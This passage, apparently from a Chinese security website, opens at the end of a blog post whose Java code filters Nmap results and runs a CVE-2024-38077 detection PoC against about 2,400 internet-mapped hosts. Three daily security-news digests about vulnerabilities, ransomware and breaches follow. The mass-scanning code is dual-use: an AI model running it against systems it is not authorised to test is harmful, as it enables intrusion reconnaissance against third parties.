nmap != null) { nmap.p135 = TNmap.findP135(line); } //3389 if (line.startsWith("3389") && nmap != null) { nmap.p3389 = TNmap.findP3389(line); //将每一个nmap对象加入list list.add(nmap); } } 到这里整个任务已经完成了一半，精准的资产已经筛选出来了，大概2400多个。接下来就是使用poc工具扫描了，毕竟两千多条数据，总不能手动设置两千多次吧，所以还是要写代码： //循环执行exe工具，参数是nmap的IP，并逐个获取执行结果 for (int i = 0; i < list.size();i++) { MNmap nmap1 = list.get(i); if ("open".equals(nmap1.p135) && "open".equals(nmap1.p3389)) { try { // 指定要执行的exe文件及其参数 ProcessBuilder processBuilder = new ProcessBuilder(exeFile, nmap1.ip); // 启动进程 Process process = processBuilder.start(); // 读取标准输出 BufferedReader r = new BufferedReader(new InputStreamReader(process.getInputStream())); String l; while ((l = r.readLine()) != null) { if (l.contains("Vulnerability")) System.out.println(l); } // 读取标准错误（如果需要） BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream())); String errorLine; while ((errorLine = errorReader.readLine()) != null) { System.out.println("Standard Error: " + errorLine); } // 等待外部程序执行完成 int exitCode = process.waitFor(); if (exitCode == 0) { System.out.println("程序执行完成"); } else { System.out.println("程序执行出错，退出码：" + exitCode); } } catch (IOException | InterruptedException e) { e.printStackTrace(); } //计数 count++; } } System.out.println("total: " + count); 这里贴出的只是关键的两段代码，完整项目见文末链接。最后将项目打成jar包，与CVE-2024-38077.exe和Nmap输出文件放在同一目录下： 开启powershell运行jar包，设置poc参数为CVE-2024-38077，同时指定输入IP的文件路径和输出文件路径，等待扫描完后得到存在漏洞的资产列表。 总结 CVE-2024-38077漏洞的探测难点在于一是没有成型的工具，二是空间测绘出来的大批量资产如何导出与二次筛选。本文的思路只是临时方案，相信后面会有大神公开其exp，最终出现像MS17010一样的工具。

1、Apache修复OFBiz中的高危安全漏洞 https://www.bleepingcomputer.com/news/security/apache-fixes-critical-ofbiz-remote-code-execution-vulnerability/ Apache已修复其开源软件OFBiz（Open For Business）中的一个安全漏洞，该漏洞可能允许攻击者在易受攻击的Linux和Windows服务器中执行任意代码，该远程代码执行漏洞被标识为CVE-2024-45195。OFBiz是一套客户关系管理（CRM）和企业资源规划（ERP）业务应用程序，也可用作基于Java的Web框架，用于开发Web应用程序。Apach 2、WordPress插件LiteSpeed Cache中存在安全漏洞 https://www.bleepingcomputer.com/news/security/litespeed-cache-bug-exposes-6-million-wordpress-sites-to-takeover-attacks/ LiteSpeed Cache是一个用于加速WordPress网站用户浏览的缓存插件，该插件中存在一个安全漏洞。该漏洞被标识为CVE-2024-44000，并被分类为未经身份验证的账户接管问题，由研究人员于2024年8月22日发现。LiteSpeed Cache在6.5.0.1版本中修复了该漏洞。WordPress报告称，仅有37.5万名用户下载了该插 3、Veeam修复其多个产品中的安全漏洞 https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-rce-flaw-in-backup-and-replication-software/ Veeam已发布多个产品的安全更新，修复了其产品Veeam Backup&Replication、Service Provider Console和One中的18个安全漏洞。其中最严重的漏洞是CVE-2024-40711，这是存在于Veeam Backup&Replication（VBR）中的远程代码执行漏洞（CVSS v3.1评分：9.8），无需身份验证即可被利 4、攻击者在思科商店网站中注入恶意JavaScript代码 https://www.bleepingcomputer.com/news/security/hackers-inject-malicious-js-in-cisco-store-to-steal-credit-cards-credentials/ 攻击者在思科公司的主题商品销售网站中注入了恶意的JavaScript代码，该网站目前已下线并正在维护中。恶意JavaScript代码经过严重混淆处理，其目的是窃取结帐过程中的数据，例如进行在线支付所需的信用卡详细信息。研究人员发现它还可以窃取一些其他信息，包括邮政地址、电话号码、电子邮件地址和用户的登录凭据。有安全研究人员称此次攻击与Cosmic 5、研究人员发现新型安卓恶意软件SpyAgent https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-android-spyagent-campaign-steals-crypto-credentials-via-image-recognition/ 最近，研究人员发现了一种新型安卓恶意软件SpyAgent，它通过扫描设备上的图像来寻找可能包含助记词的内容。助记词是一种由12个单词组成的短语，帮助用户恢复加密货币钱包，相比于典型的复杂密钥，助记词更容易被记住。这种恶意软件伪装成各种可信的应用软件，比如银行和政府服务、电视流媒体和实用工具。然而，一旦被安装到设备上，该恶意软件会秘密 6、SonicWall称CVE-2024-40766可能正被恶意利用 https://www.bleepingcomputer.com/news/security/sonicwall-sslvpn-access-control-flaw-is-now-exploited-in-attacks/ SonicWall警告称，最近修复的SonicOS中的访问控制漏洞CVE-2024-40766现在可能被用于进行攻击，管理员应尽快应用漏洞修复补丁。CVE-2024-40766是一个访问控制漏洞（CVSS v3评分：9.3），影响SonicWall防火墙第5代、第6代以及第7代设备。SonicWall没有透露关于该漏洞的更多信息，只提到其可能导致未经授权的资源访问以及使 7、OpenStack修复Ironic中的CVE-2024-44082漏洞 https://securityonline.info/openstack-ironic-users-urged-to-patch-critical-vulnerability-cve-2024-44082 OpenStack的Ironic项目中存在一个安全漏洞（CVE-2024-44082），该漏洞可能允许经过身份验证的用户访问敏感数据。该漏洞影响多个版本的Ironic和Ironic-Python-Agent（IPA）。为了修复CVE-2024-44082漏洞，OpenStack已经为所有维护的分支发布了Ironic和Ironic-Python-Agent的安全补丁。 8、攻击者使用Fog勒索软件针对金融行业进行攻击 https://adlumin.com/post/fog-ransomware-now-targeting-the-financial-sector Fog勒索软件是STOP/DJVU勒索软件家族的一个变种，首次发现于2021年，其背后的攻击者主要以教育和娱乐行业进行攻击，现在开始针对金融行业进行攻击。研究人员在2024年8月发现一起针对金融行业客户的勒索软件攻击活动，攻击者在Windows及Linux操作系统上部署了一种名为“Fog”（又名“Lost in the Fog”）的勒索软件变种。被Fog勒索软件加密的文件通常含有“.FOG”或“.FLOCKED”的扩展名，并附有名为“readm 9、MuddyWater 劫持 RMM 软件用于间谍活动 https://securityonline.info/muddywaters-sneaky-new-tactic-hijacking-rmm-software-for-espionage/ MuddyWater 是一个伊朗黑客组织，自 2017 年以来一直使用合法的 RMM 软件攻击全球组织，重点关注政府、军队、电信和石油部门。 10、美AI医疗公司服务器配置错误，5.3TB心理健康记录遭泄露 https://www.secrss.com/articles/69952 美国人工智能医疗公司Confidant Health的服务器配置错误，泄露了5.3TB的敏感心理健康记录，其中包括个人信息、评估和医疗信息，对患者构成严重的隐私风险。事件源于vpnMentor的资深网络安全研究员Jeremiah Fowler发现的一个未受密码保护且配置错误的服务器，其中包含来自Confidant Health的机密记录。9月6日，Jeremiah Fowler通过博客文章披露了这一发现。Confidant Health是一家位于德克萨斯州的人工智能平台，为康涅狄格州、佛罗里达州、新罕布什尔州、德克萨 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、攻击者利用Babylon远控木马针对马来西亚政府人员 https://cyble.com/blog/the-intricate-babylon-rat-campaign-targets-malaysian-politicians-government/ 研究人员发现了一起具有高度针对性的网络攻击活动，其目标是马来西亚的政府人员和政治人物。自7月以来，该攻击活动已使用至少三种不同的恶意ISO文件。这些恶意ISO文件中包含多个组件，包括快捷方式（LNK）文件、隐藏的PowerShell脚本、恶意可执行文件和诱饵PDF文件，并最终释放Babylon远控木马。Babylon远控木马提供多种恶意功能，包括击键捕获、剪贴板监控、密码提取和远程命令执行等。 2、新型PyPI攻击技术可能导致超2.2万软件包被劫持 https://jfrog.com/blog/revival-hijack-pypi-hijack-technique-exploited-22k-packages-at-risk/ 研究人员称，攻击者正在利用一种名为“Revival Hijack”的攻击手段，他们使用已被删除的软件包的名称注册新的PyPi项目，以此进行供应链攻击。攻击者可以通过这种方法将恶意代码推送给获取更新的开发人员。研究人员表示，PyPI上有超过22000个已删除的软件包容易受到Revival Hijack攻击，而且其中一些软件包已被广泛使用。此外，PyPI上平均每个月删除的包为309个，这表明攻击者能够持续地进行此类 3、思科修复CVE-2024-20469命令注入安全漏洞 https://www.bleepingcomputer.com/news/security/cisco-fixes-root-escalation-vulnerability-with-public-exploit-code/ 思科修复了一个命令注入漏洞，该漏洞的公开利用代码允许攻击者在易受攻击的系统上将权限提升为root权限。该漏洞被标识为CVE-2024-20469，发现于思科的身份服务引擎（ISE）中。该命令注入漏洞是由于对用户输入验证不足引起的。攻击者可以通过提交恶意构造的CLI命令，在不需要用户交互的情况下进行漏洞利用。到目前为止，思科尚未发现攻击者利用该安全漏洞进行攻击活动。 4、Debian修复两个Dovecot邮件服务器中的安全漏洞 https://tuxcare.com/blog/debian-patches-two-dovecot-vulnerabilities Dovecot是一款流行的开源IMAP和POP3服务器，适用于Linux和其他类Unix操作系统。它主要用于为用户提供电子邮件服务，使用户能够使用各种电子邮件客户端访问邮件。Dovecot中存在两个安全漏洞，被标识为CVE-2024-23184和CVE-2024-23185，攻击者可以发送带有大量地址标头或者标头过大的电子邮件消耗系统资源，从而导致拒绝服务。Debian安全团队在最近的更新中发布了安全更新，以解决这些Dovecot安全漏洞。 5、Microchip Technology证实员工数据遭到泄露 https://www.bleepingcomputer.com/news/security/microchip-technology-confirms-data-was-stolen-in-cyberattack/ 美国半导体供应商Microchip Technology Incorporated已确认员工信息在8月的网络攻击事件中泄露，Play勒索组织声称进行了此次攻击。8月20日，Microchip Technology称，多个制造设施的运营受到8月17日发现的网络攻击事件的影响。该事件影响了公司履行订单的能力，迫使其关闭部分系统并隔离受影响的系统。该公司称，攻击者从其系统中窃取了一些 6、Veeam发布安全更新修复 18 个漏洞，包括5个严重问题 https://thehackernews.com/2024/09/veeam-releases-security-updates-to-fix.html Veeam 已发布安全更新，解决影响其软件产品的 18 个安全漏洞，其中包括 5 个可能导致远程代码执行的严重漏洞。 7、工信部：我国发布三项智能网联汽车强制性国家标准 https://www.bjnews.com.cn/detail/1725433548168391.html 据工信微报公众号，近日，工业和信息化部组织制定的GB 44495—2024《汽车整车信息安全技术要求》、GB 44496—2024《汽车软件升级通用技术要求》和GB 44497—2024《智能网联汽车 自动驾驶数据记录系统》三项强制性国家标准由国家市场监督管理总局、国家标准化管理委员会批准发布，将于2026年1月1日起开始实施。 8、黑客利用 WinRAR 漏洞对俄罗斯和白俄罗斯发动攻击 https://thehackernews.com/2024/09/hacktivists-exploits-winrar.html 卡巴斯基发现，一个名为 Head Mare 的黑客组织与专门针对位于俄罗斯和白俄罗斯的网络攻击有关，他们利用了 WinRAR 中相对较新的漏洞 CVE-2023-38831 ，该漏洞允许攻击者通过专门准备的存档在系统上执行任意代码。 9、 全面治理网络乱象，公安机关网安部门指导互联网平台强化自律自治 http://m.people.cn/n4/2024/0904/c30-21221675.html 受“流量经济”刺激，个别网民为博眼球、求关注，频繁发布“改头换面、张冠李戴”式不实信息，进行造谣诽谤、恶意炒作，更有甚者，多次发布“移花接木、指桑骂槐”式谣言信息，侮辱谩骂、攻击诋毁他人，或挑起对立、煽动拉踩，借此博取流量，以达快速涨粉、谋取非法利益之目的，严重扰乱社会秩序和网络空间秩序，危害广大网民合法权益。 10、RAMBO攻击：通过RAM电磁辐射窃取隔离系统数据 https://cybersecuritynews.com/rambo-attack-air-gapped-systems/ 本研究提出了一种基于 RAM 总线电磁辐射的新型隐蔽通道。发射器调制内存访问模式以对数据进行编码，然后由接收器解调。 该攻击模型涉及恶意软件操纵 RAM 以生成无线电信号，这些信号可以编码敏感信息并从远处泄露。它介绍了能够发送和接收这些信号的发射器和接收器的设计和实现。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、报告：活跃的勒索软件团伙在2024上半年激增56% https://www.secrss.com/articles/69863 根据Searchlight Cyber的一份最新报告，2024年上半年活跃的勒索软件团伙数量同比增长了56%。 研究人员观察到，2024年上半年有73个勒索软件组织在运行，而2023年上半年为46个，这凸显了勒索软件领域的日益碎片化。 2、 微软采用基于HMAC的新安全措施解决CLFS缺陷 https://www.securityweek.com/microsoft-tackling-windows-logfile-flaws-with-new-hmac-based-security-mitigation/ 微软正在试验一项重大的新安全缓解措施，以阻止针对 Windows 通用日志文件系统 (CLFS) 漏洞的网络攻击激增。在过去五年中，用于数据和事件记录的 Windows 子系统 CLFS 中至少有 24 个已记录的漏洞，这促使微软进攻性研究与安全工程 (MORSE) 团队设计一种操作系统缓解措施来一次性解决一类漏洞。 3、Zyxel 修补网络设备中的严重漏洞 https://www.securityweek.com/zyxel-patches-critical-vulnerabilities-in-networking-devices/ Zyxel 已发布针对其网络设备中多个漏洞的补丁，其中包括影响接入点和安全路由器的严重漏洞。 4、D-Link 警告已停产路由器型号存在代码执行漏洞 https://www.securityweek.com/d-link-warns-of-code-execution-flaws-in-discontinued-router-model/ 网络硬件制造商 D-Link 上周末警告称，其已停产的 DIR-846 路由器型号受到多个远程代码执行 (RCE) 漏洞的影响。 5、Clearview AI因建立非法面部识别数据库面临 3050 万欧元罚款 https://thehackernews.com/2024/09/clearview-ai-faces-305m-fine-for.html 荷兰数据保护局 (Dutch DPA) 对面部识别公司 Clearview AI 处以 3050 万欧元（3370 万美元）的罚款，原因是该公司建立了“包含数十亿张面部照片的非法数据库”，其中包括荷兰公民的照片，违反了欧盟《通用数据保护条例》 (GDPR)。 6、谷歌敦促 Android 用户安装最新安全更新以修复被利用的漏洞 https://thehackernews.com/2024/09/google-confirms-cve-2024-32896.html 谷歌发布了针对 Android 操作系统的每月安全更新，以解决已知的安全漏洞，该漏洞已被广泛利用。该高严重性漏洞 CVE-2024-32896（CVSS 评分：7.8）与 Android 框架组件中的权限提升情况有关。 7、RomCom 集团利用 MS Office 0day漏洞部署勒索软件 https://cybersecuritynews.com/romcom-office-0-day-ransomware/ 俄罗斯犯罪集团 RomCom（别名https://cybersecuritynews.com/office-document-to-exploit-windows-search/）利用 Microsoft Office 和 Windows HTML RCE 零日漏洞（漏洞编号为 CVE-2023-36884）传播地下勒索软件。 8、YubiKeys加密漏洞能够通过提取私钥来克隆设备 https://cybersecuritynews.com/yubikeys-clone-device-secret-key/ 安全研究人员发现了 YubiKeys 中的一个重大漏洞，特别是针对 YubiKey 5 系列。此漏洞被认定为旁道攻击，允许攻击者通过提取存储在其中的密钥来克隆这些设备。 9、俄罗斯社交媒体VK泄露3.9亿条用户数据 https://www.freebuf.com/news/410160.html 据报道，俄罗斯最大的社交媒体和网络服务 VK（VKontakte）遭遇大规模数据泄露，影响了大量的用户。据非法市场 BreachForums 上一位名为 Hikki-Chan 的威胁行为者称，2024 年 9 月，VK出现大规模数据泄露事件，其数据在论坛上几乎可以免费下载，代价仅仅只需几个积分而已。 10、伊朗APT组织使用 Tickler 恶意软件攻击卫星设备 https://cybersecuritynews.com/tickler-malware/ 隶属于伊朗革命卫队的APT组织 Peach Sandstorm 在 2024 年 4 月至 7 月期间将新的多级后门 Tickler 添加到他们的武器库中。此类攻击的实施者可以通过破坏卫星系统来利用它，从而破坏通信和数据泄露，并影响导航和计时信息。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。